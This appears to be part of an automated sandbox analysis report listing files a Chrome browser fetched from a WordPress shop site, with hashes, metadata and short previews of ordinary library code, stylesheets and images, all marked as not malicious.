                                                                                                          Entropy (8bit):5.303481082929494
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                          MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                          SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                          SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                          SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (833)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1020
                                                                                                          Entropy (8bit):5.252559261946358
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:Nk1NhbmSH4J4FGMdRHXHF4qOCq5ZNsj6jjVNQoJooToV:NkrsSHC6GCXFpOl/jpNlmeoV
                                                                                                          MD5:0EDB52E6332AA60CB6A38D303A4F68B4
                                                                                                          SHA1:2243987D0F7CB01507331B40AD26F0410D40ED91
                                                                                                          SHA-256:AF0D0BAD3510DB008AC0500B4CA867289F1C93429AE4302A6AD6F8882F416BD3
                                                                                                          SHA-512:08E1529D9964F67126AB2991AB60395AE5CE76375D961596035435068247C0630B1042143B0AEC304D67A44B56F5A10968AA225C37AE9CE47D841B653390C230
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Effects Fold 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../version","../effect"],e):e(jQuery)}(function(m){"use strict";return m.effects.define("fold","hide",function(i,e){var t=m(this),c=i.mode,n="show"===c,c="hide"===c,s=i.size||15,f=/([0-9]+)%/.exec(s),o=!!i.horizFirst?["right","bottom"]:["bottom","right"],a=i.duration/2,u=m.effects.createPlaceholder(t),l=t.cssClip(),r={clip:m.extend({},l)},p={clip:m.extend({},l)},d=[l[o[0]],l[o[1]]],h=t.queue().length;f&&(s=parseInt(f[1],10)/100*d[c?0:1]),r.clip[o[0]]=s,p.clip[o[0]]=s,p.clip[o[1]]=0,n&&(t.cssClip(p.clip),u&&u.css(m.effects.clipToBox(p)),p.clip=l),t.queue(function(e){u&&u.animate(m.effects.clipToBox(r),a,i.easing).animate(m.effects.clipToBox(p),a,i.easing),e()}).animate(r,a,i.easing).animate(p,a,i.easing).queue(e),m.effects
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):44
                                                                                                          Entropy (8bit):4.324973733162441
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Hd1bLTNkKTHx42YY:TNk2xfYY
                                                                                                          MD5:C8B819F59DB2E9F9900DB2B70BFBD006
                                                                                                          SHA1:6B2AC7B7CEBD19828B024E2ADAF26D7811A86D1A
                                                                                                          SHA-256:D486B54BDF5667982DA7439D12A3C2450204E4DA0F022ABC1A10D15A23A8192D
                                                                                                          SHA-512:E1FA7DA932CF248B402BD1D500D9DF63279DCAD1CA3B74BF2BD294CACC821DDA4CC0933B3FA0E9463BA8E2A9A386A9B44FF02015D7AAB55957A92E68A5A1C531
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTMxLjAuNjc3OC4xMDkSGQk4hyNYlKRO6RIFDRM0Cs4htNAVvTihyn4SIAlcpb32yDfoPRIFDeeNQA4SBQ3OQUx6IWjz1kw5SXp1?alt=proto
                                                                                                          Preview:CgkKBw0TNArOGgAKEgoHDeeNQA4aAAoHDc5BTHoaAA==
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (59458)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):114706
                                                                                                          Entropy (8bit):4.924852554644207
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:HaeJuf7Qg5MG7H+qehvP0x2pUk44Q03Pm:Qf7Qg5MG7H+qehvP0x2pUk4T0O
                                                                                                          MD5:8C9F31823282E4E056EB0AA7FAC262A9
                                                                                                          SHA1:DC3B1A37381E079FDA8DB59C1A9469852CD18B80
                                                                                                          SHA-256:3BB38D0F302677FF4104564454F60F495133579D6E6DFB722B3DE850DF596502
                                                                                                          SHA-512:39F239C875550BF9A31254EED1F0358EA3C6309D9FCBF6005D8852843EAF60BC20B8626D169F810A6C71B7DCDB769B8512314B89BA1FDEEA2CB3089BE9D21AE0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
                                                                                                          Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15619)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):15810
                                                                                                          Entropy (8bit):5.096135394077839
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:gyRm7JRre+5fXVP5NXX+QUN3Gfp4cry7F:gys7be+5BXX+Ary7F
                                                                                                          MD5:1483B7BED8BACD5317F83F97CCE18DB2
                                                                                                          SHA1:E309DF3559FA1852BCC3606C402A67314E4A35DF
                                                                                                          SHA-256:DAD394F2FB64582D2F94F27E16B6A68B3FD63AA58E8A695D115E2ED9C7F84BC3
                                                                                                          SHA-512:59BA0A4D85D247E5C57748AB05C781340A0B9CD23D91494AA83BEFCB3C87A48EEEBF3F2C17E61D1FD9DA3F5F5E1B7DE67E9CCE1290EADA23AF2A052BBC1328AD
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js?ver=1.2.9
                                                                                                          Preview:/*! js-Offcanvas - v1.2.11 - 2019-10-16.jQuery Accesible Offcanvas Panels. * https://github.com/vmitsaras/js-offcanvas. * Copyright (c) 2019 Vasileios Mitsaras (@vmitsaras). * MIT License */.!function(a){"use strict";var b=a.utils||{};b.classes={hiddenVisually:"u-hidden-visually",modifier:"--",isActive:"is-active",isClosed:"is-closed",isOpen:"is-open",isClicked:"is-clicked",isAnimating:"is-animating",isVisible:"is-visible",hidden:"u-hidden"},b.keyCodes={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38},b.a11yclick=function(a){var c=a.charCode||a.keyCode,d=a.type;return"click"===d||"keydown"===d&&(c===b.keyCodes.SPACE||c===b.keyCodes.ENTER||void 0)},b.a11yclickBind=function(a,c,d){a.on("click."+d+" keydown."+d,function(e){b.a11yclick(e)&&(e.preventDefault(e),c&&"function"==typeof c&&c.call(),a.trigger("clicked."+d))})},b.supportTransition="transition"in document.documentElement.style||"Webk
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (42889), with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):124272
                                                                                                          Entropy (8bit):5.552390150563906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:BB3xC6/I/66Q1+sxBsWGXkWRqrlv7j5X5L3T8s+Amum28IycgtbwvZZ9IHsUq0Kn:K66U+9UWRW7Bd8s+3umck6Z/IMln
                                                                                                          MD5:45158046DA12A8625B17FABCA990D080
                                                                                                          SHA1:366F30392BDE37BF0EEC5C7DE4EC8BE5498D35E2
                                                                                                          SHA-256:87664D848161D3A5BF83A511F4F483DC05E8472D06AEDD5111488D267AF298BB
                                                                                                          SHA-512:88EF1C748B6251A489A3159B9C9A86A301840E70954D92D552D304C12CF3459CD07C609E56BC5E5C23BF87D8775A2EF861B724FE8348378FE0E27D02FFB8C3BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.5.4
                                                                                                          Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=1)}([function(t,e){t.exports=jQuery},function(t,e,n){n(2),n(6),t.exports=n(4)},function(t,e,n
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12602), with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):59050
                                                                                                          Entropy (8bit):5.351406715924575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:EGOHVQnykubNo0SwhpmUBzMghSk5h5rEUUrIUkx0+8rkUIpLM+IrAI9dHvQr58:ywykubLn8
                                                                                                          MD5:9CEB5C2236A9BC287BEB3A6BCFA7026D
                                                                                                          SHA1:DA7A269F8932BDFB4C52911F39AABC861BE0EF41
                                                                                                          SHA-256:ABE4E0480D9AD8ABB77CA74300C5B631A143CBBE942B6D19A633D3109BB86A96
                                                                                                          SHA-512:C748FBE003FA72A77809233B884D809AE07706BDA765E6321EB90EB6278BB07FF1319BCFC6FD46517DC40512E1E16FBA1B53562B4ECA9E572E94E3B63407E5AB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.4
                                                                                                          Preview:/* FIX FOR WORDPRESS's CRAZY <p> TAG ANOMALY */...rs-p-wp-fix { display: none !important; margin: 0 !important; height: 0px !important; }..../* NEW Z-INDEX FIX*/...wp-block-themepunch-revslider { position: relative }..../* FIX FOR QUICK LOADING OF SLIDER SCRIPTS AND WP-ROCKET READDING IMG TAG INTO DOM*/../*rs-sbg-px rs-sbg-wrap img { display:none !important}*/..../* MODAL BASICS */..rs-modal { position: fixed !important; z-index: 9999999 !important; pointer-events: none !important;}..rs-modal.rs-modal-auto { top: auto;bottom: auto;left: auto; right:auto; }..rs-modal.rs-modal-fullwidth,..rs-modal.rs-modal-fullscreen { top: 0px; left: 0px; width: 100%; height: 100%; }..rs-modal rs-fullwidth-wrap { position: absolute; top: 0px; left: 0px; height: 100%;}..rs-module-wrap.rs-modal { display:none; max-height: 100% !important; overflow: auto !important; pointer-events: auto !important;}..rs-module-wrap.hideallscrollbars.rs-modal { overflow: hidden !important; max-width: 100% !important}..rs-m
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (15752)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18726
                                                                                                          Entropy (8bit):4.756109283632968
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                          MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                          SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                          SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                          SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/wp-emoji-release.min.js?ver=6.7.1
                                                                                                          Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):290743
                                                                                                          Entropy (8bit):7.6308360121194045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:SGxdUqwiK2gsIJWnIvsuQIMKUYDxyl/VPy7+P4ibpSh:SwZ7KvZWn8UNQ+JSh
                                                                                                          MD5:344F848B4771CC3DF184A8D80F5C906B
                                                                                                          SHA1:ED2E3113E4DC7DC1D9DDDC88E3E59BF7CCE43C79
                                                                                                          SHA-256:42F18066C7F58967E6D8E398AD6780CDB2AE701533B76C3D73068194E1E07D63
                                                                                                          SHA-512:46AC835C92581A15707BEBB13C902E9874FD4FFE6BF5B2EF10EEC404EEEFCD15894909FE664856199D18886FBAEFC66B52BD8FEC3CB84CEAA13D445ED4901754
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2022/03/LOGO-NEERO-X-SITO_Tavola-disegno-1-1.png
                                                                                                          Preview:.PNG........IHDR.......l......,......sRGB.........eXIfMM.*.............................J...........R.(...........i.........Z.......,.......,.........................................l....!.......pHYs...#...#.x.?v...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx...i.|...NF........4.ZR..zU.3.a....Lb0.....qb.&6d.{H q^$/...E...1~...@bBL`<...].-../.e...q..>u~....<U.SU...S..{.9.sO...s........ @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10721
                                                                                                          Entropy (8bit):3.5801354464202984
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BF/VV0a8iOc9oEC+GEC7oECu2l6okiuu4hGkitCNdOSvRqedcZfwLIAD2Vieyq:PEAoYGVo96o14hG8zcS2h
                                                                                                          MD5:5913A02287279FA0C9D4704655687CCB
                                                                                                          SHA1:3BC0A4E773150BCBEFAC9DE54DF5093F6ED28232
                                                                                                          SHA-256:F62B2B2019093248189FD8E25491B3F0DEBD49A802984C8E61505B89D533C70C
                                                                                                          SHA-512:0E3B343D1AD23A38AC96C5CF483D49766CC4D9C97B508843F13AA809859D77B1C75D00BAB551DBAF56A0CE0BFAAA7B4A311FD6DFA43272EDEC03496E87FF85AE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function ($) {. /**. * refresh cart when payment method changed. */. if (awdr_params.refresh_order_review == '1') {. $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', function () {. refreshCart();. });.. /**. * refresh cart when Email changed. */. $(document).on('blur', 'input[name="billing_email"], select#billing_state', function () {. refreshCart();. });. }.. function refreshCart() {. $('body').trigger('update_checkout');. }.. $(document).ready(function ($) {. function init_events() {. if (awdr_params.enable_update_price_with_qty == 'show_dynamically') {. function getWDRDPTarget(form, target, is_variable){. let $price_place = '';. if (form.find(target).length) {. $price_place = form.find(target).first();.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65527), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):211622
                                                                                                          Entropy (8bit):4.92450461420046
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:1iZcd03kbyrTOTlX37S6MNJIw9rK3PAO6YSggX7f92WO+4n0RxV7zOYVmCb4EP:TNAO65f8WJ40pzOYV3P
                                                                                                          MD5:5BDD1E3D788393B1F2CF734E75F6E122
                                                                                                          SHA1:6EE0EA4EFDC115AA943A1E5A79B5481C37AAF9E7
                                                                                                          SHA-256:BAB414CB30E397D6805654F58E3E139E5A5283EB8C0C02CC16A4DCA0053D6B11
                                                                                                          SHA-512:3DD9279519CF0A9EB45760EE97DBA82C6113468F9346D26E4E5914606B77D3800AE104DA1DFAA9A396BA5558846EE961EA99B128FC14238CA00E83ECB197A742
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=7.6.2
                                                                                                          Preview:.wc-block-link-button{border:0;border-radius:0;margin:0;padding:0;vertical-align:baseline;color:inherit;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit;text-transform:inherit;box-shadow:none;display:inline;text-shadow:none;text-decoration:underline}.wc-block-link-button,.wc-block-link-button:active,.wc-block-link-button:focus,.wc-block-link-button:hover{background:transparent}.wc-block-suspense-placeholder{outline:0!important;border:0!important;background-color:#ebebeb!important;color:transparent!important;width:100%;border-radius:.25rem;display:block;line-height:1;position:relative!important;overflow:hidden!important;max-width:100%!important;pointer-events:none;box-shadow:none;z-index:1}.wc-block-suspense-placeholder>*{visibility:hidden}.wc-block-suspense-placeholder:after{content:" ";display:block;position:absolute;left:0;right:0;top:0;height:100%;background-repeat:no-repeat;background-ima
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):26902
                                                                                                          Entropy (8bit):4.926687428991997
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:AFi4FP8keisWDPUbMPs+FeF7F3F6K6Z7F3:Aw4FBHEFxC7x
                                                                                                          MD5:411DEB70863F87EBDC4ECE3093B86784
                                                                                                          SHA1:217825061D7808A9827BD5A69815C5FDA7297516
                                                                                                          SHA-256:66B4DEA131D6D0C0CDA6F79683EB1CC9D0E19B967F36CB1B42118F7B0F6AC742
                                                                                                          SHA-512:46D70422949758AD1ED845BA767D129A54848748FF21AABA4044D3CC0DE84172C9A577DF1A060EA23253D24AAE8DB8A4FDDD277E1C558F204C4A7FEAF60D84D6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.0
                                                                                                          Preview:.woof_container{. padding-bottom: 5px;. margin-bottom: 9px;.}...woof_container select{. width: 100%;.}...woof_container label{. display: inline-block !important;.}..ul.woof_list{. margin: 0 !important;. list-style: none !important;.}..li.woof_list{. list-style: none !important;.}...woof_list li{. list-style: none !important;.}...woof_block_html_items ul{. margin-left: 0 !important;.}...woof_list label{. vertical-align: middle;. padding-top: 4px;. padding-bottom: 4px;. display: inline-block !important;.}...woof_childs_list{. padding: 7px 0 7px 17px !important;. margin: 0 !important;.}../**********************/..woof_auto_show{. position: absolute;. z-index: 1001;. width: 100%;.}...woof_sid_auto_shortcode .woof_container{. width: 33%;. min-width: 150px;.}...woof_sid_auto_shortcode .woof_container,..woof_sid_auto_shortcode .woof_container_mselect{. overflow-x: hidden;. overflow-y: auto;. min-height: fit-content;. max-
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):290743
                                                                                                          Entropy (8bit):7.6308360121194045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:SGxdUqwiK2gsIJWnIvsuQIMKUYDxyl/VPy7+P4ibpSh:SwZ7KvZWn8UNQ+JSh
                                                                                                          MD5:344F848B4771CC3DF184A8D80F5C906B
                                                                                                          SHA1:ED2E3113E4DC7DC1D9DDDC88E3E59BF7CCE43C79
                                                                                                          SHA-256:42F18066C7F58967E6D8E398AD6780CDB2AE701533B76C3D73068194E1E07D63
                                                                                                          SHA-512:46AC835C92581A15707BEBB13C902E9874FD4FFE6BF5B2EF10EEC404EEEFCD15894909FE664856199D18886FBAEFC66B52BD8FEC3CB84CEAA13D445ED4901754
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.......l......,......sRGB.........eXIfMM.*.............................J...........R.(...........i.........Z.......,.......,.........................................l....!.......pHYs...#...#.x.?v...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx...i.|...NF........4.ZR..zU.3.a....Lb0.....qb.&6d.{H q^$/...E...1~...@bBL`<...].-../.e...q..>u~....<U.SU...S..{.9.sO...s........ @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (57791)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):58072
                                                                                                          Entropy (8bit):5.247960089226309
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:5NYyDyKAmHVaS3m3Dqp0NwCkXDtdFDLmTV+miDNJcJiQMRqyPiYtB6UvcCg8YGk:5NTKktDLmTF8yJL45XtHjoGk
                                                                                                          MD5:E1D98D47689E00F8ECBC5D9F61BDB42E
                                                                                                          SHA1:6778FED3CF095A318141A31F455C8F4663885BDE
                                                                                                          SHA-256:0A34A87842C539C1F4FEEC56BBA982FD596B73500046A6E6FE38A22260C6577B
                                                                                                          SHA-512:021E615983F30EC5477FD8B611E8C5045AC6D9900F9A9BB8649B56E0C7D282965A727F8CF501C3B7E1DDFF02F5B44924D5481BCEA7A926BE8A9E166314A07ED0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/js/bootstrap.min.js?ver=4.3.1
                                                                                                          Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,g,u){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescriptor
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3265
                                                                                                          Entropy (8bit):4.796067829007445
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7SbrUzKqv5GjBcJNkfu9Hu9kdYda+xx1UmxvmXyiD2HrPYMi6zi732K3lUgsQovp:B58BcJNd1RdYdpxcmgXyiqylChf
                                                                                                          MD5:B2DE6B41987CA830D4A394A21E0FE6DC
                                                                                                          SHA1:0F18FC00D00A92553F84F4F119760411DA2623F4
                                                                                                          SHA-256:8C80109A216052DBEB4C67FFDD0F0758B674186C62910CCC5E63F1F81E52828E
                                                                                                          SHA-512:9758C59B661D7C2D2B1D34EC493641564B0F965BD55A804534C00B5501689875E439CE93DBD646F3D7ADFA41AC1236E30A0A5C99FD9AF040566DD10F7968882B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/color/js/html_types/color.js?ver=3.3.0
                                                                                                          Preview:"use strict";.function woof_init_colors() {. //http://jsfiddle.net/jtbowden/xP2Ns/. jQuery('.woof_color_term').each(function () {.. var color = jQuery(this).data('color');. var img = jQuery(this).data('img');.. var bg = '';. if (img.length > 0) {. bg = 'background: url(' + img + ')';. } else {. bg = 'background:' + color + ' !important';. }.. var span = jQuery('<span style="' + bg + '" class="' + jQuery(this).attr('type') + ' ' + jQuery(this).attr('class') + '" title=""></span>').on('click', woof_color_do_check).mousedown(woof_color_do_down).mouseup(woof_color_do_up);. if (jQuery(this).is(':checked')) {. span.addClass('checked');. }. jQuery(this).wrap(span).hide();. jQuery(this).after('<span class="woof_color_checked"></span>');//for checking. });.. function woof_color_do_check() {. var is_checked = false;. var radio=false;. if(jQuery(this).pare
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):18536
                                                                                                          Entropy (8bit):7.986571198050597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                          MD5:8EFF0B8045FD1959E117F85654AE7770
